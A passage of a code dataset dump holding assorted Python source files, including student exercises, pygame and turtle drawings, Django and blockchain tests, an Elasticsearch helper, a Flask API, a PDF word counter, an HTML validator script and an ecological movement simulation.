c.replace(\"s\",\"$\")\n\nprint(c)\n\n#Question 7\n\nf = \"Hemingway\"\nprint(f.index(\"m\"))\n\n#Question 8\n\na = \"\\\"It was Indian summer in New Hampshire.\\\"\"\nprint(a)\n\n#Question 9\n\nz = \"three \" * 3\nprint(z)\n\n#Question 10\n\nb = \"It was a bright cold day in April, and the clocks were striking thirteen.\"\nprint(b.index(\",\"))\n\nprint(b[:33])\n\n#End of Challenge\n\n\n\n","sub_path":"6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"450369503","text":"import pygame\r\nimport numpy as np\r\n\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nLIGHTBLUE = (0, 255, 255)\r\nYELLOW = (255, 255, 0)\r\nBROWN = (65, 25, 0)\r\nPINK = (243, 0, 191)\r\nLIGHTBLUE_LAS_1 = (111,205,252)\r\nLIGHTBLUE_LAS_2 = (4,138,205)\r\nGREEN_BLACK = (4,138,1)\r\nPINK_LIGHT = (254,169,163)\r\n\r\ndef draw_foliage(surface, color, x_0, y_0, radius, num):\r\n abs_x = x_0\r\n abs_y = y_0\r\n for i in range(num//2 + 2):\r\n pygame.draw.circle(surface, color, (x_0 - 20, y_0 + 20), radius)\r\n pygame.draw.circle(surface, BLACK, (x_0 - 20, y_0 + 20), radius, 1)\r\n x_0 += 10\r\n x_0 = abs_x\r\n y_0 = abs_y\r\n for i in range(num // 2):\r\n pygame.draw.circle(surface, color, (x_0 - 10, y_0), radius)\r\n pygame.draw.circle(surface, BLACK, (x_0 - 10, y_0), radius, 1)\r\n x_0 += 10\r\n x_0 = abs_x\r\n y_0 = abs_y\r\n for i in range(1):\r\n pygame.draw.circle(surface, color, (x_0, y_0 - 20), radius)\r\n pygame.draw.circle(surface, BLACK, (x_0, y_0 - 20), radius, 1)\r\n x_0 += 10\r\n\r\ndef draw_tree(surface, x, y, width, height, color, radius_leave, num_leaves):\r\n pygame.draw.rect(surface, BLACK, (x, y, width, height))\r\n x_0 = x + 10\r\n y_0 = y - 10\r\n draw_foliage(surface, color, x_0, y_0, radius_leave, 
num_leaves)\r\n\r\ndef draw_cloud(surface, x_0, y_0, radius):\r\n abs_x = x_0\r\n abs_y = y_0\r\n for i in range(4):\r\n pygame.draw.circle(surface, WHITE, (x_0 - radius, y_0), radius)\r\n pygame.draw.circle(surface, BLACK, (x_0 - radius, y_0), radius, 1)\r\n x_0 += radius\r\n x_0 = abs_x\r\n for i in range(2):\r\n pygame.draw.circle(surface, WHITE, (x_0 , y_0 - radius), radius)\r\n pygame.draw.circle(surface, BLACK, (x_0 , y_0 - radius), radius, 1)\r\n x_0 += radius\r\n\r\ndef draw_house(surface, x_0, y_0, width, height):\r\n # draw on the surface argument instead of the global screen\r\n pygame.draw.rect(surface, BROWN, (x_0, y_0, width, height))\r\n pygame.draw.rect(surface, LIGHTBLUE_LAS_2, (x_0 + width // 3, y_0 + height // 3, width // 3, height // 3))\r\n pygame.draw.polygon(surface, PINK, [(x_0, y_0), (x_0 + width // 2, y_0 - width // 2), (x_0 + width, y_0)])\r\n\r\n\r\ndef draw_sun(surface, x_0, y_0, color, radius):\r\n phi = 0\r\n for i in range(360):\r\n pygame.draw.polygon(surface, color, ((x_0 + 5 - int(radius*np.cos(2 *np.pi / 3 - phi)),\r\n y_0 + 5 + int(radius*np.sin(2*np.pi/3 - phi))),\r\n (x_0 + 5 + int(radius*np.sin(phi) ),\r\n y_0 + 5 - int(radius*np.cos(phi)) //4),\r\n (x_0 + 5 + int(radius*np.cos(2*np.pi/3 + phi)),\r\n y_0 + 5 + int(radius*np.sin(2*np.pi/3 + phi)))))\r\n phi += 10\r\n\r\n\r\nscreen = pygame.display.set_mode((800, 800))\r\nscreen.fill(WHITE)\r\n\r\n\r\n\r\npygame.draw.rect(screen, GREEN, (0, 400, 800, 400))\r\npygame.draw.rect(screen, LIGHTBLUE_LAS_1, (0, 0, 800, 400))\r\n\r\ndraw_house(screen, 100, 420, 150, 150)\r\ndraw_house(screen, 400, 330, 100, 100)\r\n\r\ndraw_tree(screen, 590, 380, 15, 80, GREEN_BLACK, 25, 6)\r\ndraw_tree(screen, 330, 450, 20, 150, GREEN_BLACK, 25, 6)\r\ndraw_cloud(screen, 400, 200, 30)\r\ndraw_cloud(screen, 600, 250, 20)\r\ndraw_cloud(screen, 200, 300, 34)\r\ndraw_cloud(screen, 600, 150, 15)\r\ndraw_sun(screen, 100, 150, PINK_LIGHT, 70)\r\n\r\n\r\n\r\npygame.init()\r\nFPS = 30\r\n\r\npygame.display.flip()\r\n\r\npygame.display.update()\r\nclock = pygame.time.Clock()\r\n\r\n\r\nfinished = False\r\nwhile not finished:\r\n clock.tick(FPS)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n finished = True\r\n\r\n\r\n\r\npygame.quit()","sub_path":"28.09task3image2 Trofimov Ivan.py","file_name":"28.09task3image2 Trofimov Ivan.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"253846488","text":"# PREUD'HOMME BONTOUX Geoffrey - PeiP 12 - 2014/2015\n# Lab (TP) no. 5, assigned 10/10/2014 - Brownian motion\n# http://www.fil.univ-lille1.fr/~wegrzyno/portail/Info/Doc/HTML/tp_itcond_tortue.html\n\nfrom turtle import *\nfrom random import randint\n\n# Constants\nCOTE = 400\n\n# Functions\ndef tortue_sortie(cote):\n \"\"\"\n Tells whether the turtle is outside the square of side 'cote' centred\n on the origin.\n\n Precondition: cote is a strictly positive integer \n\n Example:\n >>> tortue_sortie(400)\n \"\"\"\n assert(type(cote) is int and cote > 0), \"cote must be a strictly \\\npositive integer\"\n\n return not (xcor() >= -cote/2 and xcor() <= cote/2 and \\\n ycor() >= -cote/2 and ycor() <= cote/2)\n\ndef carre(cote):\n \"\"\"\n Draws a blue square of side 'cote' centred on the origin.\n\n Precondition: cote is a strictly positive integer\n\n Example:\n >>> carre(50)\n \"\"\"\n assert(type(cote) is int and cote > 0), \"cote must be a strictly \\\npositive integer\"\n\n pencolor(\"blue\")\n penup()\n goto(-cote/2, -cote/2)\n pendown()\n for i in range(0, 4):\n forward(cote)\n left(90)\n\ndef
mouvement_brownien():\n \"\"\"\n Applies one step of Brownian motion to the turtle.\n\n Example:\n >>> mouvement_brownien()\n \"\"\"\n left(randint(0, 359))\n forward(randint(10, 30))\n\n\n# Setup\ncarre(COTE)\npenup()\npencolor(\"green\")\ngoto(0, 0)\npendown()\n\n# Movement\nwhile not tortue_sortie(COTE):\n mouvement_brownien()\n","sub_path":"S1/TP 5/brownien.py","file_name":"brownien.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"331334423","text":"from django.test import LiveServerTestCase\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import WebDriverException\nimport time\n\nMAX_WAIT = 10\n\nclass NewVisitorTest(LiveServerTestCase):\n\n def setUp(self):\n self.browser = webdriver.Firefox()\n\n def tearDown(self):\n self.browser.quit()\n\n def wait_for_elements_by_tag(self, tag_name):\n start_time = time.time()\n while True:\n try:\n elements = self.browser.find_elements_by_tag_name(tag_name)\n return elements\n except (AssertionError, WebDriverException) as e:\n if time.time() - start_time > MAX_WAIT:\n raise e\n time.sleep(0.5)\n\n def test_user_can_create_poll(self):\n\n # Susan is wasting time on the internet and accidentally opens the\n # home page of Friends Vote\n self.browser.get(self.live_server_url)\n\n ## Sanity check\n # She sees that the page title and header mention friends and voting\n self.assertEqual('Friends Vote', self.browser.title)\n header_text = self.browser.find_element_by_tag_name('h1').text\n self.assertIn('Friends Vote', header_text)\n\n # There is also an accessibly labelled text input prompting her to create\n # a new question for her friends to vote on\n question_label = self.browser.find_elements_by_tag_name('label')[0].text\n self.assertEqual(question_label, 'Enter a question for your friends to vote on:')\n\n # as well as two other inputs below that, prompting her for possible\n # answers to her question\n answer_label_1 = self.browser.find_elements_by_tag_name('label')[1].text\n self.assertEqual(answer_label_1, 'Answer 1:')\n answer_label_2 = self.browser.find_elements_by_tag_name('label')[2].text\n self.assertEqual(answer_label_2, 'Answer 2:')\n\n # She types \"What pet should I get?\" into the text box\n question_input = self.browser.find_element_by_id('question')\n question_input.send_keys('What pet should I get?')\n\n # and creates two possible answers by entering \"a cat\" and \"a dog\" into\n # the two answer inputs\n answer_input_1 = self.browser.find_element_by_id('answer-1')\n answer_input_1.send_keys('a cat')\n answer_input_2 = self.browser.find_element_by_id('answer-2')\n answer_input_2.send_keys('a dog')\n\n # Then she presses enter\n answer_input_2.send_keys(Keys.ENTER)\n\n # The page updates, and now contains her question\n question_heading = self.wait_for_elements_by_tag('h2')[0]\n self.assertEqual(question_heading.text, 'What pet should I get?')\n\n # The page also contains her answers as radio inputs\n answer_input_1 = self.wait_for_elements_by_tag('input')[0]\n self.assertEqual(answer_input_1.get_attribute('type'), 'radio')\n self.assertEqual(answer_input_1.text, 'a cat')\n answer_input_2 = self.wait_for_elements_by_tag('input')[1]\n self.assertEqual(answer_input_2.get_attribute('type'), 'radio')\n self.assertEqual(answer_input_2.text, 'a dog')\n\n # She chooses the second answer, \"a dog\", and presses enter again\n\n # The page updates again, and displays her question in a
heading\n\n # as well as each of the possible answers as list items\n\n # Next to each answer is a vote count\n\n # and a vote percentage\n\n self.fail('Expected failure: Finish the test!')\n\n # def test_can_create_and_submit_more_answer_options(self):\n # self.fail('Expected failure: Finish the test!')\n # # She sees that there is a button for adding more answers\n # # When she clicks it, a third text box appears\n # # She types \"a lizard\" into the third box\n\n ## URL flow\n\n ## What if she has 5 answer boxes but only 3 have text when she submits?\n ## What if she doesn't submit any text, or only text for one answer?\n ## What if she tries to vote/submit without choosing an answer (front end and back end)\n\n## new class - others can vote on a poll\n# Susan shares her voting URL...\n\n## new class - others can view poll results\n# Susan shares her results URL...","sub_path":"functional_tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"162414699","text":"'''\nReshape the Matrix\nEasy\n\nIn MATLAB, there is a handy function called reshape which can reshape an m x n matrix into a new one with a different size r x c keeping its original data.\n\nYou are given an m x n matrix mat and two integers r and c representing the number of rows and the number of columns of the wanted reshaped matrix.\n\nThe reshaped matrix should be filled with all the elements of the original matrix in the same row-traversing order as they were.\n\nIf the reshape operation with given parameters is possible and legal, output the new reshaped matrix; Otherwise, output the original matrix.\n\n \n\nExample 1:\n\nInput: mat = [[1,2],[3,4]], r = 1, c = 4\nOutput: [[1,2,3,4]]\n\nExample 2:\n\nInput: mat = [[1,2],[3,4]], r = 2, c = 4\nOutput: [[1,2],[3,4]]\n'''\n\n\nclass Solution:\n def matrixReshape(self, mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n vals = []\n \n for row in mat:\n vals.extend(row)\n \n if r * c != len(vals):\n return mat\n \n elif r == 1:\n return [vals]\n \n res = []\n \n for i in range(r):\n t = vals[c*i:(c*i)+c]\n res.append(t)\n \n return res\n","sub_path":"leetcode/Reshape_the_Matrix.py","file_name":"Reshape_the_Matrix.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"298607651","text":"from unittest import TestCase\n\nfrom simpleblockchain.blockchain import *\nfrom simpleblockchain.crypto import *\n\n\nclass TestBlockSerialize(TestCase):\n def test_serialize(self):\n privkey = PrivateKey.generate()\n pubkey = privkey.get_public()\n tx = Transaction(b\"\\x00\"*32, [Output(pubkey, 12345)])\n tx = privkey.sign(tx)\n block = Block(1, 2, 3, 4, [tx])\n\n deserialized = Block.deserialize(block.serialize())\n assert(pubkey.verify(block.transactions[0]))\n assert(pubkey.verify(deserialized.transactions[0]))\n assert(block == deserialized)\n","sub_path":"simpleblockchain/test_block.py","file_name":"test_block.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"199793423","text":"from elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk\n\n\nclass Elastic(object):\n def __init__(self, app=None, db=None, *args, **kwargs):\n if app:\n self.object = (\n Elasticsearch([app.config[\"ELASTICSEARCH_URL\"]])\n if app.config[\"ELASTICSEARCH_URL\"]\n else 
None\n )\n else:\n self.object = None\n self.db = db\n self.bulk_queue = [] # make sure the queue exists even if init_app() is never called\n\n def init_app(self, app, db):\n self.object = (\n Elasticsearch([app.config[\"ELASTICSEARCH_URL\"]])\n if app.config[\"ELASTICSEARCH_URL\"]\n else None\n )\n self.db = db\n self.bulk_queue = []\n\n def add_to_bulk_queue(self, index, model_object, operation):\n if operation == 'delete':\n entry = {\n \"_op_type\": operation,\n \"_index\": index,\n \"_type\": index,\n \"_id\": model_object.id\n }\n elif operation == 'index':\n entry = {\n \"_op_type\": operation,\n \"_index\": index,\n \"_type\": index,\n \"_id\": model_object.id,\n \"_source\": self._create_payload(model_object)\n }\n else:\n return\n \n self.bulk_queue.append(entry)\n\n def clear_bulk_queue(self):\n self.bulk_queue = []\n \n def perform_bulk(self):\n bulk(self.object, self.bulk_queue)\n self.clear_bulk_queue()\n\n def _create_payload(self, model_object):\n payload = dict()\n for field in model_object.__searchable__:\n if isinstance(field, str):\n payload[field] = getattr(model_object, field)\n if isinstance(field, tuple):\n subfields = field[1]\n field = field[0]\n if not isinstance(getattr(model_object, field), list):\n if len(subfields) == 1:\n payload[field] = getattr(\n getattr(model_object, field), subfields[0]\n )\n else:\n payload[field] = dict()\n for subfield in subfields:\n payload[field][subfield] = getattr(\n getattr(model_object, field), subfield\n )\n else:\n payload[field] = list()\n for sub_model_object in getattr(model_object, field):\n subfield_group = dict()\n for subfield in subfields:\n subfield_group[subfield] = getattr(\n sub_model_object, subfield\n )\n payload[field].append(subfield_group)\n return payload\n\n def add_to_index(self, index, model_object):\n if not self.object:\n return\n # payload = dict()\n # for field in model.__searchable__:\n # if \".\" in field:\n # [field, subfield] = field.split(\".\")\n # field_attr = getattr(model, field)\n # if isinstance(field_attr, self.db.Model):\n # payload[field] = getattr(field_attr, subfield)\n # elif isinstance(field_attr, list):\n # payload[field] = list()\n # for i in field_attr:\n # if isinstance(i, self.db.Model):\n # subfield_attr = getattr(i, subfield)\n # payload[field].append(subfield_attr)\n\n # else:\n # payload[field] = getattr(model, field)\n payload = self._create_payload(model_object)\n self.object.index(index=index, doc_type=index, id=model_object.id, body=payload)\n\n def remove_from_index(self, index, model_object):\n if not self.object:\n return\n self.object.delete(index=index, doc_type=index, id=model_object.id)\n\n def query_index(self, index, query, page, per_page):\n if not self.object:\n return [], 0\n search = self.object.search(\n index=index,\n body={\n \"query\": {\"multi_match\": {\"query\": query, \"fields\": [\"*\"]}},\n \"from\": (page - 1) * per_page,\n \"size\": per_page,\n },\n )\n # ids = [int(hit['_id']) for hit in search['hits']['hits']]\n return search\n","sub_path":"app/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"653119959","text":"from flask import Flask, jsonify, make_response, send_file\nfrom pymongo import MongoClient\nfrom .db_connectors import connectors\nfrom furl import furl\nfrom flask_cors import CORS\nimport io\n\n\nDB_NAME = 'cortex-db'\n\n\ndef run_api_server(host='localhost', port='5000', database_url='mongodb://localhost:27017'):\n \"\"\"\n Initializes a REST API endpoint that connects to the given database and
serves data from it\n\n :param host: The host on which the API runs\n :param port: The port on which the API runs\n :param database_url: The url (with scheme) of the database from which the API serves data\n\n \"\"\"\n server = Flask(__name__)\n CORS(server, resources={r\"/*\": {\"origins\": \"*\"}})\n\n db = furl(database_url)\n if db.scheme not in connectors:\n raise Exception(f'No connector for the {db.scheme} scheme was found. Make sure it is defined and located in the db_connectors package')\n\n connector = connectors[db.scheme](db_url = database_url)\n \n\n @server.route('/users')\n def get_users():\n return make_response(jsonify(connector.get_all_users()), 200)\n\n @server.route('/users/<int:id>')\n def get_specific_user(id):\n result = connector.get_user(id)\n if not result:\n return make_response('User not found\\n', 404)\n return make_response(jsonify(result), 200)\n\n @server.route('/users/<int:id>/snapshots')\n def get_user_snapshots(id):\n result = connector.get_user_snapshots(id)\n if not result:\n return make_response('User not found\\n', 404)\n return make_response(jsonify(result), 200)\n\n @server.route('/users/<int:user_id>/snapshots/<int:snap_id>')\n def get_snapshot(user_id, snap_id):\n result = connector.get_snapshot(user_id, snap_id)\n if not result:\n return make_response('Snapshot not found\\n', 404)\n\n return make_response(jsonify(result), 200)\n\n @server.route('/users/<int:user_id>/snapshots/<int:snap_id>/<result_name>')\n def get_result(user_id, snap_id, result_name):\n result = connector.get_result(user_id, snap_id, result_name)\n if not result:\n return make_response('Snapshot result not found\\n', 404)\n return make_response(jsonify(result), 200)\n\n @server.route('/users/<int:user_id>/snapshots/<int:snap_id>/<result_name>/data')\n def get_result_data(user_id, snap_id, result_name):\n result = connector.get_result(user_id, snap_id, result_name)\n if not result or 'data' not in result:\n return make_response('Snapshot result not found or has no data\\n', 404)\n return send_file(result['data'], mimetype='image/png')\n\n server.run(host=host, port=port)\n","sub_path":"cortex/api/api_server.py","file_name":"api_server.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"262806150","text":"import csv\r\nimport importlib\r\nimport sys\r\nimport pandas as pd\r\n\r\nimportlib.reload(sys)\r\n\r\nimport os.path\r\nfrom pdfminer.pdfparser import PDFParser, PDFDocument\r\nfrom pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter\r\nfrom pdfminer.converter import PDFPageAggregator\r\nfrom pdfminer.layout import LTTextBoxHorizontal, LAParams\r\nfrom pdfminer.pdfinterp import PDFTextExtractionNotAllowed\r\n\r\n\r\n# text_path = r'photo-words.pdf'\r\n\r\n# Check the file extension; only read files in .pdf format\r\ndef isPdf(s, *endString):\r\n array = map(s.endswith, endString)\r\n if True in array:\r\n return True\r\n else:\r\n return False\r\n\r\n# Read files from a folder in batch; path is the folder path\r\ndef readFile(path):\r\n fileList = os.listdir(path)\r\n for filename in fileList:\r\n # check the file format first\r\n if isPdf(filename, '.pdf'):\r\n # build the absolute file path\r\n filepath = path + '/' + filename\r\n parse(filepath)\r\n\r\ndef parse(filepath):\r\n '''Parse the PDF text and save it to a TXT file'''\r\n fp = open(filepath, 'rb')\r\n parser = PDFParser(fp)\r\n doc = PDFDocument()\r\n parser.set_document(doc)\r\n doc.set_parser(parser)\r\n doc.initialize()\r\n\r\n # Check whether the document allows text extraction; ignore it if not\r\n if not doc.is_extractable:\r\n raise PDFTextExtractionNotAllowed\r\n else:\r\n rsrcmgr = PDFResourceManager()\r\n laparams = LAParams()\r\n device = PDFPageAggregator(rsrcmgr, laparams=laparams)\r\n
interpreter = PDFPageInterpreter(rsrcmgr, device)\r\n\r\n # Loop over the page list, handling one page at a time\r\n for page in doc.get_pages():\r\n interpreter.process_page(page)\r\n layout = device.get_result()\r\n for x in layout:\r\n if (isinstance(x, LTTextBoxHorizontal)):\r\n with open(r'pdf_data.txt', 'a', encoding='utf-8_sig') as f:\r\n results = x.get_text()\r\n f.write(results + \"\\n\")\r\n'''\r\nStatistics: analyse the txt file from the previous stage, count how many times each word occurs, and write the counts to a csv file\r\n'''\r\ndef analysis():\r\n # Read the words from the txt file and split them into a list\r\n f = open('pdf_data.txt', encoding='utf-8_sig')\r\n voca = f.read().split(' ')\r\n f.close()\r\n\r\n # Open the csv file and write the header\r\n csv_file = open('pdf_data.csv', 'w', newline='', encoding='utf-8_sig')\r\n csv_write = csv.writer(csv_file)\r\n csv_write.writerow(['word', 'frequency'])\r\n # print(voca)\r\n while len(voca) != 0:\r\n word = voca[0]\r\n cnt = 0\r\n while word in voca: # count the occurrences of this word\r\n voca.remove(word) # remove the word once it has been counted\r\n cnt += 1\r\n if(len(word) > 3):\r\n csv_write.writerow([word, cnt]) # write to the csv file\r\n csv_file.close()\r\n\r\n# Sort by frequency, breaking ties alphabetically\r\ndef sortTime():\r\n df = pd.read_csv('pdf_data.csv', encoding='utf-8_sig')\r\n df = df.sort_values(['frequency', 'word'], ascending=False)\r\n # print(df)\r\n df.to_csv('pdf_data.csv', header=True, index=False, encoding='utf-8_sig')\r\n\r\n\r\nif __name__ == '__main__':\r\n path = 'paper' # folder containing the paper files\r\n readFile(path)\r\n analysis()\r\n sortTime()\r\n\r\n\r\n","sub_path":"parsePDF.py","file_name":"parsePDF.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"69334040","text":"from distutils.core import setup\nfrom distutils.extension import Extension\nimport os\n\n__version_str__ = \"1.0.0\"\n\n\nclass lazy_cythonize(list):\n def __init__(self, callback):\n self._list, self.callback = None, callback\n def c_list(self):\n if self._list is None: self._list = self.callback()\n return self._list\n def __iter__(self):\n for e in self.c_list(): yield e\n def __getitem__(self, ii): return self.c_list()[ii]\n def __len__(self): return len(self.c_list())\n\n\ndef extensions():\n import numpy\n from Cython.Build import cythonize\n\n # fig_path = \"figtree\"\n root, _ = os.path.split(os.path.realpath(__file__))\n fig_path = os.path.join(root, \"figtree\")\n fig_src_path = os.path.join(fig_path, \"src\")\n fig_include_path = os.path.join(fig_path, \"include\")\n ann_path = os.path.join(fig_path, \"external\", \"ann_1.1.1\")\n ann_src_path = os.path.join(ann_path, \"src\")\n ann_include_path = os.path.join(ann_path, \"include\")\n fig_sources = [os.path.join(fig_src_path, f) for f in os.listdir(fig_src_path) if f[-4:] == \".cpp\"]\n ann_sources = [os.path.join(ann_src_path, f) for f in os.listdir(ann_src_path) if f[-4:] == \".cpp\"]\n\n numpy_include_dir = numpy.get_include()\n figtree_module = Extension(\n \"figtree\",\n [\n os.path.join(root, \"figtree.pyx\"),\n *fig_sources,\n *ann_sources\n ],\n language=\"c++\",\n include_dirs=[\n ann_src_path,\n ann_include_path,\n fig_include_path,\n numpy_include_dir],\n )\n return cythonize([figtree_module])\n\n\nsetup(\n name=\"Figtree\",\n version=__version_str__,\n description=\"An implementation of the Fast Gauss Transform\",\n author=\"Vlad Morariu\",\n url=\"https://github.com/mikeswhitney33/figtree\",\n ext_modules=lazy_cythonize(extensions),\n requires=['numpy','Cython'],\n setup_requires=['numpy',
'Cython']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"634551021","text":"#!/usr/bin/env python3\n\"\"\" This is taken from the w3c_validator package, which would not install for some reason. \"\"\"\nimport requests\nimport logging\nimport tempfile\nimport os\n\nLOGGER = logging.getLogger(__name__)\nHTML_VALIDATOR_URL = \"http://validator.w3.org/nu/?out=json\"\n\n\ndef validate(filename):\n \"\"\"\n Validate file and return JSON result as dictionary.\n \"filename\" can be a file name or an HTTP URL.\n Return \"\" if the validator does not return valid JSON.\n Raise OSError if curl command returns an error status.\n \"\"\"\n # is_css = filename.endswith(\".css\")\n\n is_remote = filename.startswith(\"http://\") or filename.startswith(\n \"https://\")\n with tempfile.TemporaryFile() if is_remote else open(\n filename, \"rb\") as f:\n\n if is_remote:\n r = requests.get(filename, verify=False)\n f.write(r.content)\n f.seek(0)\n\n # if is_css:\n # cmd = (\n # \"curl -sF \\\"file=@%s;type=text/css\\\" -F output=json -F warning=0 %s\"\n # % (quoted_filename, CSS_VALIDATOR_URL))\n # _ = cmd\n # else:\n r = requests.post(\n HTML_VALIDATOR_URL,\n files={\"file\": (filename, f, \"text/html\")},\n data={\n \"out\": \"json\",\n \"showsource\": \"yes\",\n },\n verify=False)\n\n return r.json()\n\n\nfailures = 0\nfile_names = list(os.listdir(\"../\"))\nfile_names.sort()\nfor file_name in file_names:\n if file_name.endswith(\".html\") and file_name[0] in [\"1\", \"2\", \"3\", \"4\", \"5\"]:\n print(\"Processing \" + file_name)\n messages = validate(\"../\" + file_name)[\"messages\"]\n for m in messages:\n if not (m[\"message\"].startswith(\"An “img” element must have an “alt” attribute\")):\n failures += 1\n # Note that the line in the .content.html file will be about 74 lines earlier than the printed number\n # because of the extra ones added during rendering.\n print(\"Type: %(type)s, Line: %(lastLine)d, Description: %(message)s\" % m)\n\nif failures == 0:\n print(\"All files passed\")\nelse:\n print(\"{} errors\".format(failures))\n","sub_path":"tests/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"176483908","text":"import random as rnd\nimport tkinter as tk\nimport numpy as np\nimport math as math\nimport matplotlib.pyplot as plt\nfrom nlmpy import nlmpy\nfrom PIL import Image\nimport csv\n\nclass Visual:\n '''This class arranges the visual output.'''\n def __init__(self, max_x, max_y):\n '''Initialize the visual class'''\n self.zoom = 10\n self.max_x = max_x\n self.max_y = max_y\n self.root = tk.Tk()\n self.canvas = tk.Canvas(self.root,\n width=self.max_x * self.zoom,\n height=self.max_y * self.zoom)\n self.canvas.pack()\n self.canvas.config(background='white')\n self.squares = np.empty((self.max_x, self.max_y), dtype=object)\n self.initialize_squares()\n\n def create_individual(self, x, y):\n '''Creates circle for individual'''\n color = \"black\"\n radius = 0.15\n return self.canvas.create_oval((x - radius) * self.zoom,\n (y - radius) * self.zoom,\n (x + radius) * self.zoom,\n (y + radius) * self.zoom,\n outline=color,\n fill=color)\n\n def move_drawing(self, drawing, x, y):\n radius = 0.15\n self.canvas.coords(drawing, (x - radius) * self.zoom,\n (y - radius) * self.zoom,\n (x + radius) * self.zoom,\n (y + 
radius) * self.zoom)\n\n def color_square(self, resources, x, y):\n '''Changes the color of the square'''\n color = np.clip(resources / 100, 0, 1)\n green = int(255 * color)\n red = 255 - green\n blue = 0\n rgb = red, green, blue\n hex_code = '#%02x%02x%02x' % rgb\n self.canvas.itemconfigure(self.squares[x, y], fill=str(hex_code))\n\n def initialize_squares(self):\n '''returns a square (drawing object)'''\n for x in range(self.max_x):\n for y in range(self.max_y):\n self.squares[x, y] = self.canvas.create_rectangle(self.zoom * x,\n self.zoom * y,\n self.zoom * x + self.zoom,\n self.zoom * y + self.zoom,\n outline='black',\n fill='black')\n\nclass Individual:\n ''' class that regulates living individuals and their properties'''\n def __init__(self, x, y, mass, step_mean, diversion, angle, meta):\n '''initialisation'''\n self.x = x\n self.y = y\n self.age = 0\n self.mass = mass\n self.metabolic_cost = (0.14 * self.mass ** 0.751) * (3600 - 150)\n self.time_move = 150\n self.velocity = 0.30 * self.mass ** 0.29\n self.movement_cost = 0.17 * self.mass ** 0.75 + 3.4 * self.mass\n self.transport_cost = cell_size * (0.56 * self.mass ** 0.46 + 11.3 * self.mass ** 0.72)\n self.ingestion = (2 * self.mass ** 0.8) * (3600 - self.time_move)\n self.hourly_cost = self.metabolic_cost + (10 * self.transport_cost)\n self.diversion = diversion\n self.step_mean = step_mean\n self.angle = rnd.uniform(0, 2 * math.pi)\n self.resources = self.hourly_cost\n self.reproductive_age = rnd.randint(336, 504)\n self.cost = (0.158 * mass ** 0.92 * (7 * 10 ** 6)) / 15 + self.hourly_cost\n self.alive = True\n if meta.movie:\n self.drawing = meta.visual.create_individual(x, y)\n\n def move(self):\n '''relocates individual'''\n step = np.random.poisson(self.step_mean)\n self.resources -= self.metabolic_cost\n if self.resources <= 0:\n self.die()\n\n else:\n self.angle += rnd.uniform(-self.diversion, self.diversion)\n future_pos_x = self.x + step * math.cos(self.angle)\n self.y += step * math.sin(self.angle)\n meta.list_x.remove(self.x)\n self.x = future_pos_x if 0 <= future_pos_x < meta.max_x else 0 - future_pos_x if future_pos_x < 0 \\\n else meta.max_x - (future_pos_x - meta.max_x)\n self.y %= max_y\n self.resources -= self.transport_cost * step\n meta.list_x.append(self.x)\n if self.resources <= 0:\n self.die()\n\n if meta.movie:\n meta.visual.move_drawing(self.drawing, self.x, self.y)\n\n def die(self):\n '''Removes individual from the population'''\n self.alive = False\n meta.list_diversion.remove(self.diversion)\n meta.list_step.remove(self.step_mean)\n meta.list_x.remove(self.x)\n if meta.movie:\n meta.visual.canvas.delete(self.drawing)\n\n def reproduction(self):\n '''Introduction of new individuals through reproduction'''\n if self.resources // self.cost >= 0:\n for young in range(np.random.poisson(self.resources // self.cost)):\n step_mean = rnd.uniform(step_min, step_max) if np.random.rand() < mutation_rate else self.step_mean\n diversion = rnd.uniform(div_min, div_max) if np.random.rand() < mutation_rate else self.diversion\n angle = rnd.uniform(0, 2 * math.pi)\n meta.population.append(Individual(self.x, self.y, self.mass, step_mean, diversion, angle, meta))\n meta.list_diversion.append(diversion)\n meta.list_step.append(step_mean)\n meta.list_x.append(self.x)\n\n self.die()\n\nclass Metapopulation:\n '''contains the whole population and regulates the daily life'''\n def __init__(self, max_x, max_y):\n self.population = []\n self.max_x = max_x\n self.max_y = max_y\n p = suitable_habitat\n n0 = 1 - p\n continuous_env 
